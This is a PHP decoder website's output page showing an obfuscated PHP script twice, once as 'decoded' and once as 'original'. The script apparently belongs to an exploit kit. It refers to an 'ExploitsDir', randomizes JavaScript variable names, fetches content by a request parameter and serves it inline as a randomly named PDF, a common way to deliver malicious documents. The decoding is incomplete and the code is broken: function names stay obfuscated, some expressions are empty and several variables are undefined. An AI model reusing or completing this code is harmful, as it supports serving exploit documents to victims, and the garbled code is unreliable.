Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php class JavaScript { public function parseTemplate( $jsTemplate, $varNamesArr..
Decoded Output download
<?php
class JavaScript
{
public function parseTemplate( $jsTemplate, $varNamesArrayName )
{
$GLOBALS['tmpvarname'] = $varNamesArrayName;
$jsTemplate = _obfuscate_DQENMT8BCzQkLghbGB8IQUWPzwPhE( "/(\<([a-zA-Z_][a-zA-Z0-9_]*)\>)/iU", _obfuscate_DRMNGTwqHR8VKgIZLRs5Gz8mDgxbEgE( "\$o", "return Javascript::getJsVariable(\$o[2], \$GLOBALS[\"tmpvarname\"]);" ), $jsTemplate );
return $jsTemplate;
}
public function getJsVariable( $varName, $varNamesArrayName )
{
$r = "";
if ( !isset( $GLOBALS[$varNamesArrayName] ) )
{
$GLOBALS[$varNamesArrayName] = array( );
}
if ( isset( $GLOBALS[$varNamesArrayName][$varName] ) )
{
$r = $GLOBALS[$varNamesArrayName][$varName];
}
else
{
$r = ( );
while ( _obfuscate_DRomDhFbHx03LxUnDjAHJB0aMAw3CwE( $r, $GLOBALS[$varNamesArrayName] ) )
{
$r = ( );
}
$GLOBALS[$varNamesArrayName][$varName] = $r;
}
return $r;
}
public function genJsVariableName( )
{
$human_vars = $_SERVER['pdftiff']['human_vars'];
$w = _obfuscate_DRk9FT0fAywxOQ5bQDQBBxABWwUkQAE( " ", $human_vars );
$o = array( );
$badChars = array( "([ ])", "([^a-zA-Z])", "(-{2,})" );
foreach ( $w as $i )
{
$i = _obfuscate_DVs8CzASGTw9XAkdEh8AjAvJgQ0NBE( $i );
$i = _obfuscate_DRUSND8kEiE8KCM7ChgyEFwxBQMrGzI( $badChars, "", $i );
$i = _obfuscate_DUAChMkNBIpMycFKTE0JSkBBS8BCRE( $i );
if ( _obfuscate_DQUKDz4LLhwXMRYlDzMvDikHHBwYKyI( $i ) <= 6 )
{
$o[$i] = 1;
}
}
$max = 1 + _obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % 2;
$i = 0;
$var = "_";
$o = _obfuscate_DR4HCQ4OAw00HDsPWykQDgwQGjESDiI( $o );
$badWords = "as namespace use false null true boolean final short byte float static char int double long in for if or and";
$badWords = _obfuscate_DRk9FT0fAywxOQ5bQDQBBxABWwUkQAE( " ", $badWords );
while ( $i++ < $max )
{
$s = $o[_obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % _obfuscate_DRAxBQwdBxskCygsEhQtIzAOJBUtNAE( $o )];
$s[0] = _obfuscate_DRYCGzgRBRAfNiosBgYMO0AnXCQsBjI( $s[0] );
$var .= $s;
}
$var[0] = _obfuscate_DUAChMkNBIpMycFKTE0JSkBBS8BCRE( $var[0] );
while ( isset( $_SERVER['human_vars'][$var] ) || _obfuscate_DRomDhFbHx03LxUnDjAHJB0aMAw3CwE( $var, $badWords ) )
{
$s = $o[_obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % _obfuscate_DRAxBQwdBxskCygsEhQtIzAOJBUtNAE( $o )];
$s[0] = _obfuscate_DRYCGzgRBRAfNiosBgYMO0AnXCQsBjI( $s[0] );
$var .= $s;
}
$_SERVER['human_vars'][$var] = true;
return $var;
}
}
class JS
{
public function RandomezeVar( $text )
{
$alphabet = "qwertyuiopasdfghjklzxcvbnm";
$minLen = 2;
$maxLen = 4;
$Var_168 = _obfuscate_DQUKDz4LLhwXMRYlDzMvDikHHBwYKyI( $alphabet );
$ereg = "/<\*[^>]+>/";
$used = array( );
while ( _obfuscate_DRY8CTU0QAIoCDQJEUAGMAYjKSEoLiI( $ereg, $text, $match ) )
{
$var = $match[0];
$good = false;
while ( !$good )
{
$replacement = "";
$len = $minLen + _obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % ( $maxLen - $minLen + 1 );
$i = 0;
while ( $i < $len )
{
$char = $alphabet[_obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % $alphabetLen];
$replacement .= $char;
++$i;
}
if ( _obfuscate_DTITE1sGFhUDHwYBFwoPFTwPNA4YIiI( $replacement, $used ) === false )
{
$good = true;
$used[] = $replacement;
}
}
$text = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQE( $var, $replacement, $text );
}
return $text;
}
}
if ( !isset( $_GET['f'] ) )
{
exit( );
}
include( "../config.php" );
$fname = $_SERVER['PHP_SELF'];
$fname = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQE( _obfuscate_DTIfMBg4CRsICzYhDiI4LAEJLQcDLiI( __FILE__ ), ( "DownloadFileName" ).".php", $fname );
$fname = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQE( ( "ExploitsDir" )."/", "", $fname );
$url = "http://".$_SERVER['SERVER_NAME'].$fname."?f="._obfuscate_DRkHJz41OylAAiEOLBQJXAMvJgUnIhE( $_GET['f'] )."&s=4";
$_SERVER['pdftiff']['human_vars'] = "a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z";
$_SERVER['pdftiff']['min_entropy'] = 2;
$_SERVER['pdftiff']['max_entropy'] = 3;
$pdf = _obfuscate_DQERBREYGDwHHggPEwE_EFw5ISxcDzI( $url );
_obfuscate_DRQ2OAYsFSk2HRwnQDkNBh4CCRoqLAE( );
_obfuscate_DQUrNTMROAdAIkAGHTI5PQYPKCw2BTI( );
_obfuscate_DQUKDz4LLhwXMRYlDzMvDikHHBwYKyI( "Content-Length: ".$Var_1320 );
_obfuscate_DQUrNTMROAdAIkAGHTI5PQYPKCw2BTI( "Content-Disposition: inline; filename="._obfuscate_DT4wEgo5IxEdCi4E1wdLy0lCCY8MAE( _obfuscate_DS4hKz4aOB8QCicHGCc2CQQcFT0TCSI( _obfuscate_DQsLIg8CNQwUGhAWBBI4KQVcJgIrMgE( ) ), 0, 5 )."d.pdf" );
_obfuscate_DQUrNTMROAdAIkAGHTI5PQYPKCw2BTI( "Content-Type: application/pdf" );
echo $pdf;
exit( );
?>
Did this file decode correctly?
Original Code
<?php
class JavaScript
{
public function parseTemplate( $jsTemplate, $varNamesArrayName )
{
$GLOBALS['tmpvarname'] = $varNamesArrayName;
$jsTemplate = _obfuscate_DQENMT8BCzQkLghbGB8IQUWPzwPhE( "/(\\<([a-zA-Z_][a-zA-Z0-9_]*)\\>)/iU", _obfuscate_DRMNGTwqHR8VKgIZLRs5Gz8mDgxbEgE( "\$o", "return Javascript::getJsVariable(\$o[2], \$GLOBALS[\"tmpvarname\"]);" ), $jsTemplate );
return $jsTemplate;
}
public function getJsVariable( $varName, $varNamesArrayName )
{
$r = "";
if ( !isset( $GLOBALS[$varNamesArrayName] ) )
{
$GLOBALS[$varNamesArrayName] = array( );
}
if ( isset( $GLOBALS[$varNamesArrayName][$varName] ) )
{
$r = $GLOBALS[$varNamesArrayName][$varName];
}
else
{
$r = ( );
while ( _obfuscate_DRomDhFbHx03LxUnDjAHJB0aMAw3CwE( $r, $GLOBALS[$varNamesArrayName] ) )
{
$r = ( );
}
$GLOBALS[$varNamesArrayName][$varName] = $r;
}
return $r;
}
public function genJsVariableName( )
{
$human_vars = $_SERVER['pdftiff']['human_vars'];
$w = _obfuscate_DRk9FT0fAywxOQ5bQDQBBxABWwUkQAE( " ", $human_vars );
$o = array( );
$badChars = array( "([ ])", "([^a-zA-Z])", "(-{2,})" );
foreach ( $w as $i )
{
$i = _obfuscate_DVs8CzASGTw9XAkdEh8AjAvJgQ0NBE( $i );
$i = _obfuscate_DRUSND8kEiE8KCM7ChgyEFwxBQMrGzI( $badChars, "", $i );
$i = _obfuscate_DUAChMkNBIpMycFKTE0JSkBBS8BCRE( $i );
if ( _obfuscate_DQUKDz4LLhwXMRYlDzMvDikHHBwYKyI( $i ) <= 6 )
{
$o[$i] = 1;
}
}
$max = 1 + _obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % 2;
$i = 0;
$var = "_";
$o = _obfuscate_DR4HCQ4OAw00HDsPWykQDgwQGjESDiI( $o );
$badWords = "as namespace use false null true boolean final short byte float static char int double long in for if or and";
$badWords = _obfuscate_DRk9FT0fAywxOQ5bQDQBBxABWwUkQAE( " ", $badWords );
while ( $i++ < $max )
{
$s = $o[_obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % _obfuscate_DRAxBQwdBxskCygsEhQtIzAOJBUtNAE( $o )];
$s[0] = _obfuscate_DRYCGzgRBRAfNiosBgYMO0AnXCQsBjI( $s[0] );
$var .= $s;
}
$var[0] = _obfuscate_DUAChMkNBIpMycFKTE0JSkBBS8BCRE( $var[0] );
while ( isset( $_SERVER['human_vars'][$var] ) || _obfuscate_DRomDhFbHx03LxUnDjAHJB0aMAw3CwE( $var, $badWords ) )
{
$s = $o[_obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % _obfuscate_DRAxBQwdBxskCygsEhQtIzAOJBUtNAE( $o )];
$s[0] = _obfuscate_DRYCGzgRBRAfNiosBgYMO0AnXCQsBjI( $s[0] );
$var .= $s;
}
$_SERVER['human_vars'][$var] = true;
return $var;
}
}
class JS
{
public function RandomezeVar( $text )
{
$alphabet = "qwertyuiopasdfghjklzxcvbnm";
$minLen = 2;
$maxLen = 4;
$Var_168 = _obfuscate_DQUKDz4LLhwXMRYlDzMvDikHHBwYKyI( $alphabet );
$ereg = "/<\\*[^>]+>/";
$used = array( );
while ( _obfuscate_DRY8CTU0QAIoCDQJEUAGMAYjKSEoLiI( $ereg, $text, $match ) )
{
$var = $match[0];
$good = false;
while ( !$good )
{
$replacement = "";
$len = $minLen + _obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % ( $maxLen - $minLen + 1 );
$i = 0;
while ( $i < $len )
{
$char = $alphabet[_obfuscate_DSwjPRcWHSEJGRwyDRISIQ4KNBYtETI( ) % $alphabetLen];
$replacement .= $char;
++$i;
}
if ( _obfuscate_DTITE1sGFhUDHwYBFwoPFTwPNA4YIiI( $replacement, $used ) === false )
{
$good = true;
$used[] = $replacement;
}
}
$text = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQE( $var, $replacement, $text );
}
return $text;
}
}
if ( !isset( $_GET['f'] ) )
{
exit( );
}
include( "../config.php" );
$fname = $_SERVER['PHP_SELF'];
$fname = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQE( _obfuscate_DTIfMBg4CRsICzYhDiI4LAEJLQcDLiI( __FILE__ ), ( "DownloadFileName" ).".php", $fname );
$fname = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQE( ( "ExploitsDir" )."/", "", $fname );
$url = "http://".$_SERVER['SERVER_NAME'].$fname."?f="._obfuscate_DRkHJz41OylAAiEOLBQJXAMvJgUnIhE( $_GET['f'] )."&s=4";
$_SERVER['pdftiff']['human_vars'] = "a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z";
$_SERVER['pdftiff']['min_entropy'] = 2;
$_SERVER['pdftiff']['max_entropy'] = 3;
$pdf = _obfuscate_DQERBREYGDwHHggPEwE_EFw5ISxcDzI( $url );
_obfuscate_DRQ2OAYsFSk2HRwnQDkNBh4CCRoqLAE( );
_obfuscate_DQUrNTMROAdAIkAGHTI5PQYPKCw2BTI( );
_obfuscate_DQUKDz4LLhwXMRYlDzMvDikHHBwYKyI( "Content-Length: ".$Var_1320 );
_obfuscate_DQUrNTMROAdAIkAGHTI5PQYPKCw2BTI( "Content-Disposition: inline; filename="._obfuscate_DT4wEgo5IxEdCi4E1wdLy0lCCY8MAE( _obfuscate_DS4hKz4aOB8QCicHGCc2CQQcFT0TCSI( _obfuscate_DQsLIg8CNQwUGhAWBBI4KQVcJgIrMgE( ) ), 0, 5 )."d.pdf" );
_obfuscate_DQUrNTMROAdAIkAGHTI5PQYPKCw2BTI( "Content-Type: application/pdf" );
echo $pdf;
exit( );
?>
Function Calls
None |
Stats
MD5 | 430603b1aa13a74ec1c0d60272775af1 |
Eval Count | 0 |
Decode Time | 107 ms |